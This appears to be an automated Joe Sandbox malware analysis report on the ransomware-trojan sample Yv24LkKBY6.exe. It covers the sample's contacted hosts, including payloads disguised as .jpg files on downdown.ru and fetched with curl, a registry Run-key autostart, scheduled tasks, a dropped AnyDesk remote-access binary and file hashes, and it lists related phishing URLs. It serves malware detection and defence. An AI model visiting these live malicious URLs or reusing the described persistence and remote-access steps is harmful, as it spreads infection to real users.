                                                                                                                          http://downdown.ru/blat.jpgWinsta0curl.exe, 00000023.00000002.20327423704.0000000000DB0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000002.20327171797.0000000000CB0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://www.4t-niagara.com/tray.htmltmll=Trays.exe, 00000029.00000002.21461662298.0000000000855000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://www.dk-soft.org/driver.exe, 00000028.00000003.20430251957.0000000002E12000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://downdown.ru/dc.jpYv24LkKBY6.exe, 00000000.00000003.20236817758.0000000002210000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://downdown.ru/wol.jpg;curl.exe, 00000026.00000002.20395527745.0000000001560000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://anydesk.com/en/privacysvchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://help.anydesk.com/HelpLinkInstallLocationAnyDesksvchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmptrue
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            239.255.255.250
                                                                                                                            		unknownReserved
                                                                                                                            		unknownunknownfalse
                                                                                                                            185.125.51.5
                                                                                                                            		downdown.ruRussian Federation
                                                                                                                            		207064INPLATLABS-ASRUtrue
                                                                                                                            160.202.165.71
                                                                                                                            		relay-30ea2fb5.net.anydesk.comNew Zealand
                                                                                                                            		63018DEDICATEDUSfalse
                                                                                                                            94.23.158.211
                                                                                                                            		www.4t-niagara.comFrance
                                                                                                                            		16276OVHFRfalse
                                                                                                                            239.255.102.18
                                                                                                                            		unknownReserved
                                                                                                                            		unknownunknownfalse
                                                                                                                            57.129.37.157
                                                                                                                            		boot.net.anydesk.comBelgium
                                                                                                                            		2686ATGS-MMD-ASUSfalse

                                                                                                                            Private

                                                                                                                            IP
                                                                                                                            192.168.11.20
                                                                                                                            127.0.0.1

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                                            Analysis ID:1588958
                                                                                                                            Start date and time:2025-01-11 07:51:33 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 13m 5s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                            Run name:Suspected VM Detection
                                                                                                                            Number of analysed new started processes analysed:73
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:Yv24LkKBY6.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.rans.troj.spyw.evad.winEXE@139/246@4/8
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 87.5%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 98%
                                                                                                                            • Number of executed functions: 223
                                                                                                                            • Number of non-executed functions: 229
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 104.102.249.139, 104.102.249.201, 23.220.206.57, 23.220.206.48, 23.33.85.226, 23.33.85.234, 199.232.214.172, 4.153.29.52, 142.250.191.163, 142.250.190.35, 142.250.190.67, 172.217.2.35, 20.190.157.3, 13.107.42.16, 204.79.197.237, 20.75.60.91, 20.96.153.111, 204.79.197.239, 23.215.15.137, 13.107.21.237, 23.215.15.173, 23.213.53.28
                                                                                                                            • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, prod-atm-wds-nav.trafficmanager.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, c.msn.com, ntp.msn.com, nav.smartscreen.microsoft.com, arc.msn.com, acroipm2.adobe.com, dns.msftncsi.com, login.live.com, th.bing.com, a122.dscd.akamai.net, dns.quad9.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, config.edge.skype.com, www.bing.com, assets.msn.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, prod-atm-wds-edge.trafficmanager.net, edge.microsoft.com, c.bing.com, sb.scorecardresearch.com, api.msn.com, prod-agic-eu2-1.eastus2.cloudapp.azure.com
                                                                                                                            • Execution Graph export aborted for target Yv24LkKBY6.exe, PID 5908 because there are no executed function
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            01:54:05API Interceptor1x Sleep call for process: svchost.exe modified
                                                                                                                            01:54:12API Interceptor1x Sleep call for process: AnyDesk.exe modified
                                                                                                                            01:54:21API Interceptor15x Sleep call for process: powershell.exe modified
                                                                                                                            01:54:23API Interceptor4x Sleep call for process: Trays.exe modified
                                                                                                                            07:53:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Video Configurations C:\Intel\Trays\trays.lnk
                                                                                                                            07:53:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Video Configurations C:\Intel\Trays\trays.lnk
                                                                                                                            07:54:21Task SchedulerRun new task: ShutdownAt5AM path: shutdown s>/s /f /t 0
                                                                                                                            07:54:23Task SchedulerRun new task: WakeUpAndLaunchEdge path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            239.255.255.250https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                                                                                              https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNXGet hashmaliciousUnknownBrowse
                                                                                                                                https://youtube.com0x360x380x370x340x370x340x370x300x370x330x330x610x320x660x320x660x360x310x360x640x360x360x370x320x320x650x370x320x370x350x320x660x370x320x360x620x320x650x370x300x360x380x370x300x330x660x360x390x360x340x330x640x330x320x330x300x330x300x320x360x370x330x360x390x370x340x360x350x350x660x360x390x360x340x330x640x370x330x330x310x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x320x360x310x360x650x360x650x360x350x370x320x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x330x360x630x360x390x360x330x360x620x320x360x360x350x370x360x360x350x360x650x370x340x330x330x330x640x330x310x320x620x320x350x330x320x340x360x320x620x320x350x330x350x340x320x330x320x330x350x330x300x320x350x330x350x340x340x320x620x320x350x330x350x340x320x360x390x360x650x360x340x360x350x370x380x350x660x360x320x350x660x360x330x320x350x330x350x340x340x320x620x320x350x340x340x330x300x320x350x330x390x330x330x320x350x340x340x330x300x320x350x340x320x340x320x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x300x320x350x340x320x330x320x320x350x340x340x330x300x320x350x340x320x340x340x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x310x320x350x330x380x340x360x320x620x320x350x340x340x330x310x320x350x330x380x330x310x320x350x340x340x330x310x320x350x330x380x330x320x320x350x340x340x330x340x370x380x360x340x390x320x390x330x370x320x330x300x390x340x370x330x340x300x330x340x2d0x380x380x340x330x340x370x330x340x300x340x390x300x350x370x330x370x340x330x300x340x300x330x340x380x320x2d0x340x300x390x340x380x2d0x320x2d0x340x380x380x320x2d0x330x320x380x380x340x370x370x320x390x390x320x380x380x380x340x370x340x370x320x390x300x340x390x340x370x320x340x300x380x320x340x370x340x370x320x620x320x640x320x620x320x350x340x340x330x300x320x350x330x390x330x340x320x350x340x340x330x300x320x350x340x320x330x350x320x350x340x340x330x300x320x350x340x320x340x330x320x350x340x340x330x300x320x350x340x320x330x380x320x350x340x340x330x300x320x350x340x320x340x310x320x350x340x340x330Get hashmaliciousUnknownBrowse
                                                                                                                                  http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                    http://www.jadavisinjurylawyers.com/Get hashmaliciousUnknownBrowse
                                                                                                                                      http://txto.eu.org/Get hashmaliciousUnknownBrowse
                                                                                                                                        https://noiclethomas.wixsite.com/riceGet hashmaliciousUnknownBrowse
                                                                                                                                          phish_alert_sp2_2.0.0.0(4).emlGet hashmaliciousUnknownBrowse
                                                                                                                                            https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                                                                                                                              https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                                                                                                                                185.125.51.5eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • downdown.ru/bat.jpg
                                                                                                                                                eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • downdown.ru/bat.jpg
                                                                                                                                                94.23.158.211eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • www.4t-niagara.com/checkupdate.php
                                                                                                                                                eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • www.4t-niagara.com/checkupdate.php
                                                                                                                                                239.255.102.18eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  SecuriteInfo.com.Program.RemoteAdminNET.1.22990.5900.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                    92f25a21-b9c1-4aee-af3e-cacf098605e9Get hashmaliciousUnknownBrowse

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      downdown.rueqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 185.125.51.5
                                                                                                                                                      eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 185.125.51.5
                                                                                                                                                      www.4t-niagara.comeqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 94.23.158.211
                                                                                                                                                      eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 94.23.158.211
                                                                                                                                                      boot.net.anydesk.comeqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 57.129.37.28
                                                                                                                                                      eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.223.88.41
                                                                                                                                                      https://mailustabucaedu-my.sharepoint.com/:u:/g/personal/stella_pabon_ustabuca_edu_co/EWCk8BqICKBBrExz32n-PvYBCVoLK4PToNCGKPT0vElGYg?e=w0tQWEGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.223.88.232
                                                                                                                                                      _AnyDesk.exe_Get hashmaliciousUnknownBrowse
                                                                                                                                                      • 57.128.101.75
                                                                                                                                                      f_0002b5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 57.128.101.74
                                                                                                                                                      f_0002b5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 195.181.174.167
                                                                                                                                                      https://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 185.229.191.39
                                                                                                                                                      http://116.0.56.101:9191/images/Distribution.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 49.12.130.235
                                                                                                                                                      SysrI6zSkJ.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                      • 37.59.29.33

                                                                                                                                                      ASNs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      DEDICATEDUSXClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                      • 144.48.105.119
                                                                                                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                      • 38.87.151.159
                                                                                                                                                      TRC.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 74.201.216.32
                                                                                                                                                      meow.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 194.26.25.141
                                                                                                                                                      meow.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 194.26.25.7
                                                                                                                                                      la.bot.arm-20241006-1050.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 200.220.163.218
                                                                                                                                                      2.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                      • 216.105.171.163
                                                                                                                                                      dKMlbDZXP3.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 216.52.183.163
                                                                                                                                                      build.htaGet hashmaliciousQuasarBrowse
                                                                                                                                                      • 64.42.179.59
                                                                                                                                                      build.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                      • 64.42.179.59
                                                                                                                                                      OVHFRlkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 151.80.4.227
                                                                                                                                                      4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 164.133.191.35
                                                                                                                                                      frosty.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 51.178.95.194
                                                                                                                                                      https://www.depoqq.win/genoGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 54.36.150.184
                                                                                                                                                      RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                      • 51.195.88.199
                                                                                                                                                      https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2Bp0zWbjdQ23pm6OHkVsvPYDi1myQ0pU4BHbfSebmhjQAIDDVMgAvG7Znw7Pr8RLFA8HEKUDF6j4JiiZ3slfATgGRu3-2BdlWbffHNdZW8UBc7QW6Nxd08b90zhz6-2FhInZrSp1J-2Fh9yU6gsolKI10c6pp1uA-2FrYRI2h9aMn65O5NvFrP-2Fc-2BjlCyvznYBIXNfkBGEguSmRbREbgogGbx0CjJc9kfZpcF-2F4T3W7floa7RxJ5-2BKjbFDYD7FnGxTCmOAt-2BDLn5J0y5KvJMT3qFWKyQo5DJ5ru0B7ksJyMiI6L18xz5XP2GRtxbC7dwfszL4xopys7uMk6wzOFXTrTU9jYi2ZvQxqCtOzUddy1WGVe8msfQF8x3k3Ejw4p6mGzrKR8wOZXnO3uVw5n8j0tNkc31-2F1y7FsWAGygTmAHNV4DJiUXG3-2Foq61jCXRLG1PMMCZ97ToDeMjE9XjfX-2Bb4NXrzqR3tgw-3D-3DwyWG_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcLQ6-2Bsxhj60Ehn0XDEyVD6MCEZ1gioYU2lwgwkCuP2dHRX-2FYdZnQ31dEdwKW37GtXYj9HmZ1F0YrZWwSELmaO5K7noqwYAhu2QGcGqOtQYdjShoJMVTWOe6BTzZXQxib8Y6rd4SX-2BUwZMt-2BbgPIpal6PcS8i4PCSiFy8RF-2Ftt22Wpj713n23BIU6an4375YDP3Get hashmaliciousUnknownBrowse
                                                                                                                                                      • 51.38.120.206
                                                                                                                                                      https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2BpuOeo6wXhYyQnN5Dmhl9EwD4jJy2QucAxD5PJ8TFaAtq5-2Fa2JLywFyD22uAsFmhYjQLp65IuicFXReMolU22hvgQ-2B1S2bacC3gnzhuRxI8SAkOsPFFxOcYEiSSZTqVyp3m1OxPmLRrTi1o5-2FZom3YCyV1EUto77Rrvablg0dLCkGGW0ncnt-2B7IgK6LBBZRD7ITvGmpDjZtTYsz0I1qKiLzZdNfmubxarfJC5-2BcEqOw-2Ft-2FbdrugnVMUWHAHioUxjwvqr4QWKZSVt-2BeoNRvP2Adsk-2FRWXyTy-2FNsOG5tm8W5iiSHTNAe6b2ve-2F-2FMif4OPRLC2jk2zIHDBodMQqimJe7S-2B0c0a6VcurrTf-2BSSIJw1siTQylKaBjy96o6v7aWNACMPOJmDH5ybp8Hfg60OUEGx1ZLebRMpxX9k9AP7u40PlQ7YN0etELZUsiTbXY4PcX2P96RfnnTH8k4gdprbyM68BwIDNXqkSpWupXgXawXvLifC6eFYgMzHs5EFbgb5u6HEHo2__tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcL7zwYzcSR3guHWoKhXDu5EQ7SXJZpci4hCmpp1REa7W1YXEAS6JqnE9LrlFK998LZ271LMIRubQetxBOsHxh3FfsHQej0U45DqU0JnGYKUA9waD6Ny-2BL9vchurlVMDvBupSQHaqHAKs87lmzkMbvNLGI-2BMPx7o1UJrTBuhk-2BVx-2FdFVsZL4Uf2HUcBJTS73hyiGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 51.75.86.98
                                                                                                                                                      3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 164.133.191.143
                                                                                                                                                      https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2Bp0zWbjdQ23pm6OHkVsvPYDi1myQ0pU4BHbfSebmhjQAIDDVMgAvG7Znw7Pr8RLFA8HEKUDF6j4JiiZ3slfATgGRu3-2BdlWbffHNdZW8UBc7QW6Nxd08b90zhz6-2FhInZrSp1J-2Fh9yU6gsolKI10c6pp1uA-2FrYRI2h9aMn65O5NvFrP-2Fc-2BjlCyvznYBIXNfkBGEguSmRbREbgogGbx0CjJc9kfZpcF-2F4T3W7floa7RxJ5-2BKjbFDYD7FnGxTCmOAt-2BDLn5J0y5KvJMT3qFWKyQo5DJ5ru0B7ksJyMiI6L18xz5XP2GRtxbC7dwfszL4xopys7uMk6wzOFXTrTU9jYi2ZvQxqCtOzUddy1WGVe8msfQF8x3k3Ejw4p6mGzrKR8wOZXnO3uVw5n8j0tNkc31-2F1y7FsWAGygTmAHNV4DJiUXG3-2Foq61jCXRLG1PMMCZ97ToDeMjE9XjfX-2Bb4NXrzqR3tgw-3D-3DrgFz_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcLui8UPBZcrEcBQ64UpH2s9-2FDpSu9qfcgYFRQKTYsD5OOP7p7kgdevUOf60UO0BtzRorOOVdIMlEbf0g38VGeCmtkP8At2J-2BxKEtoZ2O48KqLdUMGUmxH4Esb-2BPRc25uZJoq4Qo0YWw9j31285luIdhLwnz-2B9RfofSABy36tB5aPmDcVeLn5C5N5AJkqjfepa6Get hashmaliciousUnknownBrowse
                                                                                                                                                      • 51.89.9.252
                                                                                                                                                      INPLATLABS-ASRUeqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 185.125.51.5
                                                                                                                                                      eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 185.125.51.5
                                                                                                                                                      d80327695eebee6940b7a55704b4c712e22c37f5bc95f2d5d6fc83e90f87bf55_dump.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                      • 185.125.50.121
                                                                                                                                                      SecuriteInfo.com.Variant.MSILHeracles.172068.27755.23666.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                      • 185.125.50.121
                                                                                                                                                      4FkYkTt9dE.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                      • 185.125.50.121
                                                                                                                                                      SecuriteInfo.com.Trojan.DownLoaderNET.987.29728.6216.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                      • 185.125.50.121
                                                                                                                                                      SecuriteInfo.com.Win32.RATX-gen.24946.23294.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                      • 185.125.50.121
                                                                                                                                                      SecuriteInfo.com.Trojan.DownLoad4.16337.3540.9873.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                      • 185.125.50.121
                                                                                                                                                      SecuriteInfo.com.Win32.CrypterX-gen.8664.12357.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                      • 185.125.50.121

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      c91bde19008eefabce276152ccd51457eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 160.202.165.71
                                                                                                                                                      • 57.129.37.157
                                                                                                                                                      eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 160.202.165.71
                                                                                                                                                      • 57.129.37.157
                                                                                                                                                      https://www.axians-ewaste.com/faq/anleitung-installation-signatursoftware/Get hashmaliciousUnknownBrowse
                                                                                                                                                      • 160.202.165.71
                                                                                                                                                      • 57.129.37.157
                                                                                                                                                      f_0002b5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 160.202.165.71
                                                                                                                                                      • 57.129.37.157
                                                                                                                                                      f_0002b5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 160.202.165.71
                                                                                                                                                      • 57.129.37.157
                                                                                                                                                      SysrI6zSkJ.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                      • 160.202.165.71
                                                                                                                                                      • 57.129.37.157
                                                                                                                                                      SysrI6zSkJ.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                      • 160.202.165.71
                                                                                                                                                      • 57.129.37.157
                                                                                                                                                      AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 160.202.165.71
                                                                                                                                                      • 57.129.37.157
                                                                                                                                                      AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 160.202.165.71
                                                                                                                                                      • 57.129.37.157

                                                                                                                                                      Dropped Files

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      C:\Intel\AnyDesk\AnyDesk.exeeqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          C:\Intel\Trays\4t-min64.exeeqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              C:\Intel\Trays\7z.dlleqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                eqRHH2whJu.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                  C:\Intel\ 131.pdf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\Yv24LkKBY6.exe
                                                                                                                                                                  File Type:PDF document, version 1.7, 1 pages
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):25674
                                                                                                                                                                  Entropy (8bit):7.907670571017708
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:9yG9CsIne7IVDIeIQzBgpt9Y4xhGyU3RSFVmQqnN8088XKNWMQiOM+k3T3lA:dslVlJy99x5U3EF8QqnKV8XqWXnMBJA
                                                                                                                                                                  MD5:E3ABD5BD617DFA2C7ED0F241BC08475D
                                                                                                                                                                  SHA1:9D1885FB570C84C419CBF0DAC0A9B770B5BF349B
                                                                                                                                                                  SHA-256:A6FF418F0DB461536CFF41E9C7E5DBA3EE3B405541519820DB8A52B6D818A01E
                                                                                                                                                                  SHA-512:18A3D578D0200E77B15574E5EE8BEEE74CDBC3BD4C1CA6AEBF29594FFBFC467DD8A20B3382FD6845A914AB0FFE387DCCAB3CF793DBCB62115B0C30E99773766D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:%PDF-1.7.%.....3 0 obj.<<./Type /XObject./Subtype /Image./Width 557./Height 685./BitsPerComponent 8./ColorSpace /DeviceRGB./Filter /FlateDecode./Length 5 0 R.>>.stream.x...<9..[.p..{..Br[.00b.HGJ4.r.X0..$V)..H........Ab.+4.@]J..nhA.b..;y...~_GFVef....*.a;^;..'.p.O'.............,......n.;.... .TI*......*.6]*@}....?...?.........)b$5.......}......O?.......h$...F>...b4E......d....'.|....}...?...(.L4...G#...4R..W.)...._.7...........>8...$....n.......D..~...?...../..._..w.......?..O..5.....]....g2. ...@.+.O~...{.W......(Q.'j.%.!J.B..._.!..x...|.;...........5}..?.....!.Iz..B.}..'.|................F..>..........4..w.......?........+.W...F........?..~....4."..d.)C.~..G.}.........K_......v.........o...F\..9+C..._?..Cd...^G. _.....|.[....~.......o...q......d....B. _...6..7.......?...~...2...Y.............................{.F..qA.........}._.._{.:............................D....n C..0#......2...3...... C....T..->2..0/Ww.7....x0.!d..`F.!d..`F.!d..`F.!d..`F....].S.V

                                                                                                                                                                  C:\Intel\AnyDesk\AnyDesk.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\svchost.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5331456
                                                                                                                                                                  Entropy (8bit):7.99990183000247
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:98304:K/9YNbhcFtvWK+XJURR51NX6hzzVwDmIoEWXF5fX+LWHF7uC+:KCNbhcF1WKW6whfOjGvAWHM
                                                                                                                                                                  MD5:39F35F94DB3D8CD6B2811D1A5C4E5BDA
                                                                                                                                                                  SHA1:6AEDB74E3C6B886A2945323C8789B32891CA12A2
                                                                                                                                                                  SHA-256:7F813D6552F20F2E761807E94C34EDCFE91570A9D637C82C955AE52768367046
                                                                                                                                                                  SHA-512:8E009A0E4398EDBCDB7BEE17F37AE5885935E910348F0FC2FFE838BBFFB2B56BF6DE9BB7F34B08C04DD8ABB1C29C0313006697872D9EBF09950947B96758F16D
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: eqRHH2whJu.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: eqRHH2whJu.exe, Detection: malicious, Browse
